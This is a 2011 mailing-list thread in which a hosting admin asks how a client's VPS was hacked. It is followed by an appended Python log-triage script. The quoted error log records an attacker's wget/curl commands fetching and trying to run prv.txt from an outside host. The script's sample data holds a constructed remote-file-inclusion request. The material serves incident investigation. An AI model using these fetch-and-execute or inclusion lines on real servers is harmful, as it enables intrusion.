[BlueOnyx:08834] Re: vps hacked

Steffan general at ziggo.nl
Fri Oct 14 03:41:53 -05 2011


YES it did
But I don't see any problem

www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:07:13 +0200] "GET /robots.txt HTTP/1.1" 406 - "-" "-"
www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:12:59 +0200] "GET / HTTP/1.1" 304 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] File does not exist: /home/sites/www.stabikon.de/web/en/robots.txt
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html


-----Original Message-----
From: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] On behalf of Ken - Precision Web Hosting, Inc
Sent: Thursday, 13 October 2011 17:40
To: BlueOnyx General Mailing List
Subject: [BlueOnyx:08828] Re: vps hacked


----- Original Message ----- 
From: Steffan
To: blueonyx at blueonyx.it
Sent: Thursday, October 13, 2011 5:07 AM
Subject: [BlueOnyx:08816] vps hacked


I still have a client with a BlueQuartz server (vps)

This morning the virtual server was hacked
I looked in the logs and found this in /var/log/httpd/error_log



[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40--  http://rapha.altervista.org/prv.txt
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]

    0K .......... .......... .......                         100% 1015.53 KB/s

00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]

sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:--  98324^M100 28039  100 28039    0     0   403k      0 --:--:-- --:--:-- --:--:--  899k
sh: line 3: prv.txt: command not found
--00:07:40--  http://rapha.altervista.org/prv.txt
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]

    0K .......... .......... .......                         100% 1020.34 KB/s

00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]

sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:--  42493^M100 28039  100 28039    0     0   507k      0 --:--:-- --:--:-- --:--:-- 1048k
sh: line 3: prv.txt: command not found

I don't see any admin logins.
How can I find out what happened?
I don't see anything weird in the access log or message log.

Thanxs Steffan


What if you
cat /var/log/httpd/access_log | grep 220.181.125.72

Is that IP address accessing any php scripts on your server?

Or look right before that snippet that you pasted.

----
Ken Marcus
Precision Web Hosting, Inc.
http://www.precisionweb.net
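Ken's suggestion above, carried out as a script: this is an added example, not code from the thread or from BlueOnyx/BlueQuartz. It parses access_log lines in the vhost-prefixed combined format quoted in the thread, keeps requests from the client IP within a window around the error_log timestamp, and flags those that hit a script or carry the fetched host or file name. The sample log mixes the two lines quoted in the thread with one constructed line; timestamps are compared as naive local time, assuming both logs use the same zone.

```python
import re
from datetime import datetime, timedelta

# Apache combined log format with the vhost name prepended, as quoted in this thread.
ACCESS_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) '
    r'(?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Substrings in a request target worth a look: host and file the error_log shows being fetched, plus download helpers.
INDICATORS = ("rapha.altervista.org", "prv.txt", "http://", "wget", "curl")

def parse_access_line(line):
    m = ACCESS_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # error_log stamps carry no zone offset, so both logs are compared as naive local time (assumed same zone).
    rec["time"] = datetime.strptime(rec["time"].split()[0], "%d/%b/%Y:%H:%M:%S")
    return rec

def requests_from_ip(lines, ip, pivot, window_minutes=30):
    """Entries from `ip` within +/- window of the error_log time, each with reasons it merits review."""
    lo, hi = pivot - timedelta(minutes=window_minutes), pivot + timedelta(minutes=window_minutes)
    out = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or rec["ip"] != ip or not (lo <= rec["time"] <= hi):
            continue
        target = rec["target"].lower()
        reasons = []
        if target.split("?", 1)[0].endswith((".php", ".cgi", ".pl")):
            reasons.append("script requested")
        hits = [s for s in INDICATORS if s in target]
        if hits:
            reasons.append("indicator in request: " + ", ".join(hits))
        rec["reasons"] = reasons
        out.append(rec)
    return out

# Two lines quoted in the thread plus one CONSTRUCTED line (not from the thread) with a PHP request carrying the fetched URL.
SAMPLE_LOG = """\
www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:07:13 +0200] "GET /robots.txt HTTP/1.1" 406 - "-" "-"
www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:07:40 +0200] "GET /index.php?page=http://rapha.altervista.org/prv.txt HTTP/1.1" 200 512 "-" "-"
www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:12:59 +0200] "GET / HTTP/1.1" 304 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
""".splitlines()
PIVOT = datetime.strptime("Wed Oct 12 00:07:13 2011", "%a %b %d %H:%M:%S %Y")  # the error_log stamp from the thread

if __name__ == "__main__":
    for r in requests_from_ip(SAMPLE_LOG, "220.181.125.72", PIVOT):
        print("REVIEW" if r["reasons"] else "  ok  ", r["time"], r["status"], r["target"], "; ".join(r["reasons"]))
```

On a real server, replace SAMPLE_LOG with the lines of /var/log/httpd/access_log and PIVOT with the first error_log timestamp of the wget/curl output; the entries just before the pivot are the ones Ken points at.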

_______________________________________________
Blueonyx mailing list
Blueonyx at mail.blueonyx.it
http://mail.blueonyx.it/mailman/listinfo/blueonyx